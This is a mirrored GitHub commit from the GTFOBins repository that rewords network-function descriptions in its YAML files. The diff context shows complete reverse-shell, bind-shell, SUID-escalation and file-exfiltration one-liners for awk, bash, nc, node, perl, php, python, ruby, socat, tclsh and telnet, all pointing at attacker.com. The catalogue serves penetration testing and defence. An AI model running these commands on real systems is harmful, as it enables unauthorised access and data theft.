mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-01-13 07:19:08 +01:00
Rephrase network functions descriptions
This commit is contained in:
parent
b857c98f92
commit
feb07b18fb
@ -7,7 +7,7 @@ functions:
|
|||||||
suid-limited:
|
suid-limited:
|
||||||
- code: ./awk 'BEGIN {system("/bin/sh -p")}'
|
- code: ./awk 'BEGIN {system("/bin/sh -p")}'
|
||||||
reverse-shell-non-interactive:
|
reverse-shell-non-interactive:
|
||||||
- description: Run `nc -l -p 12345` to receive the shell on the other end.
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
RPORT=12345
|
RPORT=12345
|
||||||
@ -16,7 +16,7 @@ functions:
|
|||||||
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
|
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
|
||||||
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
|
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
|
||||||
bind-shell-non-interactive:
|
bind-shell-non-interactive:
|
||||||
- description: Run `nc target.com 12345` to connect to the shell on the other end.
|
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
||||||
code: |
|
code: |
|
||||||
LPORT=12345
|
LPORT=12345
|
||||||
awk -v LPORT=$LPORT 'BEGIN {
|
awk -v LPORT=$LPORT 'BEGIN {
|
||||||
|
@ -7,13 +7,13 @@ functions:
|
|||||||
suid-enabled:
|
suid-enabled:
|
||||||
- code: ./bash -p
|
- code: ./bash -p
|
||||||
upload:
|
upload:
|
||||||
- description: Send local file in the body of an HTTP POST request. Run an HTTP service to collect the file on the other end.
|
- description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||||
code: |
|
code: |
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
RPORT=12345
|
RPORT=12345
|
||||||
LFILE=file_to_send
|
LFILE=file_to_send
|
||||||
echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT
|
echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT
|
||||||
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "where_to_save"` to collect the file on the other end.
|
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "where_to_save"` on the attacker box to collect the file.
|
||||||
code: |
|
code: |
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
RPORT=12345
|
RPORT=12345
|
||||||
@ -26,14 +26,14 @@ functions:
|
|||||||
RPORT=12345
|
RPORT=12345
|
||||||
LFILE=file_to_get
|
LFILE=file_to_get
|
||||||
(echo -e "GET /$LFILE HTTP/0.9\r\n\r\n" 1>&3 & cat 0<&3) 3<>/dev/tcp/$RHOST/$RPORT | (read i; while [ "$(echo $i | tr -d '\r')" != "" ]; do read i; done; cat) > $LFILE
|
(echo -e "GET /$LFILE HTTP/0.9\r\n\r\n" 1>&3 & cat 0<&3) 3<>/dev/tcp/$RHOST/$RPORT | (read i; while [ "$(echo $i | tr -d '\r')" != "" ]; do read i; done; cat) > $LFILE
|
||||||
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` to send the file from the other end.
|
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
|
||||||
code: |-
|
code: |-
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
RPORT=12345
|
RPORT=12345
|
||||||
LFILE=file_to_get
|
LFILE=file_to_get
|
||||||
cat < /dev/tcp/$RHOST/$RPORT > $LFILE
|
cat < /dev/tcp/$RHOST/$RPORT > $LFILE
|
||||||
reverse-shell:
|
reverse-shell:
|
||||||
- description: Run `nc -l -p 12345` to receive the shell on the other end.
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
RPORT=12345
|
RPORT=12345
|
||||||
|
@ -2,26 +2,26 @@
|
|||||||
functions:
|
functions:
|
||||||
upload:
|
upload:
|
||||||
- description: |
|
- description: |
|
||||||
Send a file to a TCP port. Run `nc -l -p 12345 > "where_to_save"` to collect the file on the other end.
|
Send a file to a TCP port. Run `nc -l -p 12345 > "where_to_save"` on the attacker box to collect the file.
|
||||||
code: |
|
code: |
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
RPORT=12345
|
RPORT=12345
|
||||||
LFILE=file_to_send
|
LFILE=file_to_send
|
||||||
nc $RHOST $RPORT < "$LFILE"
|
nc $RHOST $RPORT < "$LFILE"
|
||||||
download:
|
download:
|
||||||
- description: Fetch remote file from a remote TCP port. Run `nc target.com 12345 < "file_to_send"` to send the file from the other end.
|
- description: Fetch remote file from a remote TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file.
|
||||||
code: |-
|
code: |-
|
||||||
LPORT=12345
|
LPORT=12345
|
||||||
LFILE=where_to_save
|
LFILE=where_to_save
|
||||||
nc -l -p $LPORT > "$LFILE"
|
nc -l -p $LPORT > "$LFILE"
|
||||||
reverse-shell:
|
reverse-shell:
|
||||||
- description: Run `nc -l -p 12345` to receive the shell on the other end.
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
RPORT=12345
|
RPORT=12345
|
||||||
nc -e /bin/sh $RHOST $RPORT
|
nc -e /bin/sh $RHOST $RPORT
|
||||||
bind-shell:
|
bind-shell:
|
||||||
- description: Run `nc target.com 12345` to connect to the shell on the other end.
|
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
||||||
code: |
|
code: |
|
||||||
LPORT=12345
|
LPORT=12345
|
||||||
nc -l -p $LPORT -e /bin/sh
|
nc -l -p $LPORT -e /bin/sh
|
||||||
|
@ -10,7 +10,7 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});'
|
./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});'
|
||||||
reverse-shell:
|
reverse-shell:
|
||||||
- description: Run `nc -l -p 12345` to receive the shell on the other end.
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
export RPORT=12345
|
export RPORT=12345
|
||||||
@ -21,7 +21,7 @@ functions:
|
|||||||
sh.stderr.pipe(this);
|
sh.stderr.pipe(this);
|
||||||
});'
|
});'
|
||||||
bind-shell:
|
bind-shell:
|
||||||
- description: Run `nc target.com 12345` to connect to the shell on the other end.
|
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
||||||
code: |
|
code: |
|
||||||
export LPORT=12345
|
export LPORT=12345
|
||||||
node -e 'sh = require("child_process").spawn("/bin/sh");
|
node -e 'sh = require("child_process").spawn("/bin/sh");
|
||||||
|
@ -7,7 +7,7 @@ functions:
|
|||||||
suid-enabled:
|
suid-enabled:
|
||||||
- code: ./perl -e 'exec "/bin/sh";'
|
- code: ./perl -e 'exec "/bin/sh";'
|
||||||
reverse-shell:
|
reverse-shell:
|
||||||
- description: Run `nc -l -p 12345` to receive the shell on the other end.
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
export RPORT=12345
|
export RPORT=12345
|
||||||
|
@ -32,7 +32,7 @@ functions:
|
|||||||
export LFILE=where_to_save
|
export LFILE=where_to_save
|
||||||
php -r '$c=file_get_contents($_ENV["URL"]);file_put_contents($_ENV["LFILE"], $c);'
|
php -r '$c=file_get_contents($_ENV["URL"]);file_put_contents($_ENV["LFILE"], $c);'
|
||||||
reverse-shell:
|
reverse-shell:
|
||||||
- description: Run `nc -l -p 12345` to receive the shell on the other end.
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
export RPORT=12345
|
export RPORT=12345
|
||||||
|
@ -7,7 +7,7 @@ functions:
|
|||||||
suid-enabled:
|
suid-enabled:
|
||||||
- code: ./python -c 'import os; os.system("/bin/sh -p")'
|
- code: ./python -c 'import os; os.system("/bin/sh -p")'
|
||||||
upload:
|
upload:
|
||||||
- description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service to collect the file on the other end.
|
- description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||||
code: |
|
code: |
|
||||||
export URL=http://attacker.com/
|
export URL=http://attacker.com/
|
||||||
export LFILE=file_to_send
|
export LFILE=file_to_send
|
||||||
@ -23,7 +23,7 @@ functions:
|
|||||||
export LFILE=where_to_save
|
export LFILE=where_to_save
|
||||||
python -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
|
python -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
|
||||||
reverse-shell:
|
reverse-shell:
|
||||||
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> to receive the shell on the other end.
|
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
export RPORT=12345
|
export RPORT=12345
|
||||||
|
@ -7,7 +7,7 @@ functions:
|
|||||||
suid-enabled:
|
suid-enabled:
|
||||||
- code: ./python3 -c 'import os; os.system("/bin/sh -p")'
|
- code: ./python3 -c 'import os; os.system("/bin/sh -p")'
|
||||||
upload:
|
upload:
|
||||||
- description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service to collect the file on the other end.
|
- description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||||
code: |
|
code: |
|
||||||
export URL=http://attacker.com/
|
export URL=http://attacker.com/
|
||||||
export LFILE=file_to_send
|
export LFILE=file_to_send
|
||||||
@ -23,7 +23,7 @@ functions:
|
|||||||
export LFILE=where_to_save
|
export LFILE=where_to_save
|
||||||
python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])'
|
python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])'
|
||||||
reverse-shell:
|
reverse-shell:
|
||||||
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> to receive the shell on the other end.
|
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
export RPORT=12345
|
export RPORT=12345
|
||||||
|
@ -10,7 +10,7 @@ functions:
|
|||||||
export LPORT=8888
|
export LPORT=8888
|
||||||
ruby -run -e httpd . -p $LPORT
|
ruby -run -e httpd . -p $LPORT
|
||||||
reverse-shell:
|
reverse-shell:
|
||||||
- description: Run `nc -l -p 12345` to receive the shell on the other end.
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
export RPORT=12345
|
export RPORT=12345
|
||||||
|
@ -1,13 +1,13 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
reverse-shell:
|
reverse-shell:
|
||||||
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> to receive the shell on the other end.
|
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
RPORT=12345
|
RPORT=12345
|
||||||
socat tcp-connect:$RHOST:$RPORT exec:"bash -li",pty,stderr,setsid,sigint,sane
|
socat tcp-connect:$RHOST:$RPORT exec:"bash -li",pty,stderr,setsid,sigint,sane
|
||||||
bind-shell:
|
bind-shell:
|
||||||
- description: Run <code>socat FILE:`tty`,raw,echo=0 TCP:target.com:12345</code> to connect to the shell on the other end.
|
- description: Run <code>socat FILE:`tty`,raw,echo=0 TCP:target.com:12345</code> on the attacker box to connect to the shell.
|
||||||
code: |
|
code: |
|
||||||
LPORT=12345
|
LPORT=12345
|
||||||
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
|
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
|
||||||
|
@ -13,7 +13,7 @@ functions:
|
|||||||
./tclsh
|
./tclsh
|
||||||
exec /bin/sh -p <@stdin >@stdout 2>@stderr
|
exec /bin/sh -p <@stdin >@stdout 2>@stderr
|
||||||
reverse-shell-non-interactive:
|
reverse-shell-non-interactive:
|
||||||
- description: Run `nc -l -p 12345` to receive the shell on the other end.
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
export RPORT=12345
|
export RPORT=12345
|
||||||
|
@ -9,7 +9,7 @@ functions:
|
|||||||
^]
|
^]
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
reverse-shell:
|
reverse-shell:
|
||||||
- description: Run `nc -l -p 12345` to receive the shell on the other end.
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
RPORT=12345
|
RPORT=12345
|
||||||
|
@ -1,7 +1,7 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
upload:
|
upload:
|
||||||
- description: Send base64-encoded local file via "d" parameter of a HTTP POST request. Run an HTTP service to collect the file on the other end.
|
- description: Send base64-encoded local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||||
code: |
|
code: |
|
||||||
export URL=http://attacker.com/
|
export URL=http://attacker.com/
|
||||||
export LFILE=file_to_send
|
export LFILE=file_to_send
|
||||||
|
Loading…
Reference in New Issue
Block a user